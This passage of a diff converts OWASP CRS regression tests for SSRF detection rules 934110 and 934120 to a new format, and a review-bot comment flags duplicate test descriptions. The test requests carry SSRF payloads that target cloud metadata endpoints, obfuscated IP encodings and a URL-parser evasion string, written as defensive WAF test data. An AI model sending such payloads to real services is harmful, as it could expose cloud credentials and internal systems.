 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get/test?ssrf=169.254.169.254%2Flatest%2Fuser-data"
- version: "HTTP/1.1"
- output:
- no_log_contains: id "934110"
- - test_title: 934110-7
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get/test?ssrf=169.254.169.254%2Flatest%2Fuser-data"
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: id "934110"
+ - test_id: 7
 desc: SSRF - negative test aws
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Flatest"
- version: "HTTP/1.1"
- output:
- no_log_contains: id "934110"
- - test_title: 934110-8
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Flatest"
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: id "934110"
+ - test_id: 8
 desc: SSRF - negative test gcp
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get/test?ssrf=http%3A%2F%2Fmetadata.google.internal"
- version: "HTTP/1.1"
- output:
- no_log_contains: id "934110"
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get/test?ssrf=http%3A%2F%2Fmetadata.google.internal"
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: id "934110"
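Review bot: Tests 6 and 7 of 934110 keep the identical `desc: SSRF - negative test aws`, so a failing run cannot tell which negative case regressed; the two descriptions should be made distinguishable by what each URI actually sends, e.g. `desc: SSRF - negative test aws, no scheme` for test 6 (`ssrf=169.254.169.254%2Flatest%2Fuser-data`) and `desc: SSRF - negative test aws, bare /latest path` for test 7 (`ssrf=http%3A%2F%2F169.254.169.254%2Flatest`). The same duplication appears in the 934120 hunk for tests 16/17 (`SSRF - Negative tests - IPV6 Compressed`, where only the closing bracket differs) and 25/26 (`SSRF - Enclosed alphanumerics 3 - text`). The `desc` lines are unchanged context here, so this is a follow-up to the test_id migration rather than a defect the commit introduces.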
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml
index d39766afd..76f57f20d 100644
--- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml
+++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml
@@ -1,891 +1,841 @@
 ---
 meta:
 author: "fzipitria, Max Leske, azurit"
- enabled: true
- name: "934120.yaml"
 description: "Description"
+rule_id: 934120
 tests:
- - test_title: 934120-1
+ - test_id: 1
 desc: SSRF - IPv4, Dotless decimal
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=http://2852039166/"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-2
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=http://2852039166/"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 2
 desc: SSRF - IPv4, Dotless decimal with overflow
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=http://7147006462/"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-3
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=http://7147006462/"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 3
 desc: SSRF - IPv4, Dotted hexadecimal
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=http://0xA9.0xFE.0xA9.0xFE/"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-4
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=http://0xA9.0xFE.0xA9.0xFE/"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 4
 desc: SSRF - IPv4, Dotless hexadecimal
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=http://0xA9FEA9FE/"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-5
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=http://0xA9FEA9FE/"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 5
 desc: SSRF - IPv4, Dotless hexadecimal with overflow
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=http://0x41414141A9FEA9FE/"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-6
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=http://0x41414141A9FEA9FE/"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 6
 desc: SSRF - IPv4, Dotted octal
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=http://0251.0376.0251.0376/"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-7
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=http://0251.0376.0251.0376/"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 7
 desc: SSRF - IPv4, Dotted octal with padding
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=http://0251.00376.000251.0000376/"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-8
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=http://0251.00376.000251.0000376/"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 8
 desc: SSRF - IPv4, dotted, two bytes decimal, two bytes octal
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=http://169.254.43518/"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-9
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=http://169.254.43518/"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 9
 desc: SSRF - IPv4, dotted, one byte decimal, three bytes octal
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=http://169.16689662/"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-10
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=http://169.16689662/"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 10
 desc: SSRF - IPv6, first 10 bytes compressed
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=http://[::ffff:a9fe:a9fe]"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-11
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=http://[::ffff:a9fe:a9fe]"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 11
 desc: SSRF - IPV6 Expanded
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=http://[0:0:0:0:0:ffff:a9fe:a9fe]"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-12
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=http://[0:0:0:0:0:ffff:a9fe:a9fe]"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 12
 desc: SSRF - IPV6 Expanded - Negative tests
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]"
- version: "HTTP/1.1"
- output:
- no_log_contains: id "934120"
- - test_title: 934120-13
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]"
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: id "934120"
+ - test_id: 13
 desc: SSRF - Dotless decimal - Negative tests
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=2852039166"
- version: "HTTP/1.1"
- output:
- no_log_contains: id "934120"
- - test_title: 934120-14
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=2852039166"
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: id "934120"
+ - test_id: 14
 desc: SSRF - Dotless hexadecimal with overflow - Negative tests
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=0x41414141A9FEA9FE"
- version: "HTTP/1.1"
- output:
- no_log_contains: id "934120"
- - test_title: 934120-15
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=0x41414141A9FEA9FE"
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: id "934120"
+ - test_id: 15
 desc: SSRF - Negative tests - IPv4, dotted, one byte decimal, three bytes octal
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=169.16689662"
- version: "HTTP/1.1"
- output:
- no_log_contains: id "934120"
- - test_title: 934120-16
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=169.16689662"
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: id "934120"
+ - test_id: 16
 desc: SSRF - Negative tests - IPV6 Compressed
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=[::ffff:a9fe:a9fe"
- version: "HTTP/1.1"
- output:
- no_log_contains: id "934120"
- - test_title: 934120-17
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=[::ffff:a9fe:a9fe"
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: id "934120"
+ - test_id: 17
 desc: SSRF - Negative tests - IPV6 Compressed
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=[::ffff:a9fe:a9fe]"
- version: "HTTP/1.1"
- output:
- no_log_contains: id "934120"
- - test_title: 934120-18
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=[::ffff:a9fe:a9fe]"
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: id "934120"
+ - test_id: 18
 desc: SSRF - Negative tests - IPV6 Expanded
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]"
- version: "HTTP/1.1"
- output:
- no_log_contains: id "934120"
- - test_title: 934120-19
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]"
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: id "934120"
+ - test_id: 19
 desc: SSRF - Negative tests - IPV6/IPV4
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=[0:0:0:0:0:ffff:169.254.169.254]"
- version: "HTTP/1.1"
- output:
- no_log_contains: id "934120"
- - test_title: 934120-20
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=[0:0:0:0:0:ffff:169.254.169.254]"
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: id "934120"
+ - test_id: 20
 desc: SSRF - Evasion technique 1
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=http%3A%2F%2Fgoogle.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-21
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=http%3A%2F%2Fgoogle.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 21
 desc: SSRF - Weird protocol scheme 1
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=xri://[0:0:0:0:0:ffff:169.254.169.254]"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-22
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=xri://[0:0:0:0:0:ffff:169.254.169.254]"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 22
 desc: SSRF - Weird protocol scheme 2
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=rsync://[0:0:0:0:0:ffff:169.254.169.254]"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-23
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=rsync://[0:0:0:0:0:ffff:169.254.169.254]"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 23
 desc: SSRF - Enclosed alphanumerics 1 - digits
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=acap://①②⑦.⓪.⓪.①"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-24
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=acap://①②⑦.⓪.⓪.①"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 24
 desc: SSRF - Enclosed alphanumerics 2 - digits
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=imap://①⑥⑨.②⑤④.①⑥⑨.②⑤④"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-25
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=imap://①⑥⑨.②⑤④.①⑥⑨.②⑤④"
+ version: "HTTP/1.1"
+ output:
